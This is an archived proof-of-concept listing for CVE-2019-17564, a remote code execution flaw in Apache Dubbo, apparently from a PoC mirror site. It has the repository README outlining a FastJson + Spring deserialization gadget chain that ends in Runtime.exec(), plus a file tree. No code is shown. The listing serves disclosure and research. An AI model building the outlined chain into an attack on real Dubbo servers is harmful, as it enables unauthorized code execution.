Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-17564 PoC — Apache Dubbo 安全漏洞

Source
https://github.com/Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget
Associated Vulnerability
Title:Apache Dubbo 安全漏洞 (CVE-2019-17564)
Description:Apache Dubbo 2.7.0版本至2.7.4版本、2.6.0版本至2.6.7版本和2.5.x版本中存在安全漏洞,该漏洞源于Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当。攻击者可利用该漏洞执行任意代码。
Description
Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564 - more information available at https://www.checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability
Readme
# CVE-2019-17564 FastJson + SpringFramework Gadget for Dubbo 2.7.3
Our full write-up is available at https://www.checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability

Note that *this is not an exploit*; it is a POC gadget chain used in an exploit used to demonstrate deserialization in scopes containing certain dependencies.

# Overview
Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564. This code will print, and locally deserialize, a gadget based on dependencies available in the scope of Dubbo 2.7.3, Dubbo Common 2.7.3, and Spring Framework 

# Gadget Chain Structure
1.	HashMap.putVal(h,k,v)
    a.	The result of hashCode(), h, is identical for HotSwappableTargetSource objects, triggering a deeper equals() call on HashMap keys when a second value is inserted
2.	HotSwappableTargetSource.equals()
3.	XString.equals()
4.	com.alibaba.fastjson.JSON.toString()
5.	com.alibaba.fastjson.JSON.toJSONString()
6.	com.alibaba.fastjson.serializer.MapSerializer.write()
7.	TemplatesImpl.getOutputProperties()
8.	TemplatesImpl.newTransformer()
9.	TemplatesImpl.getTransletInstance()
10.	TemplatesImpl.defineTransletClasses()
11.	ClassLoader.defineClass()
12.	Class.newInstance()
13.	MaliciousClass.<clinit>()
14.	Runtime.exec()

# Credits
Credits are in order to Chris Frohoff and Moritz Bechler for their research and tools (ysoserial and marshalsec), as some of their code was used in the gadget chain, and their research laid the foundation for this exploit.

Credits are also in order to Checkmarx, who enable this type of research, and our fantastic research group for pitching ideas, reviewing, and bearing the fact that I won't shut up about this type of stuff.
File Snapshot

 [4.0K]  /data/pocs/32357a24f11da4ce5289d20fa993144d9fa6f57b
├── [1.6K]  pom.xml
├── [1.7K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [4.0K]  DubboGadget
                ├── [2.0K]  DubboGadget.java
                └── [8.0K]  Utils.java

4 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.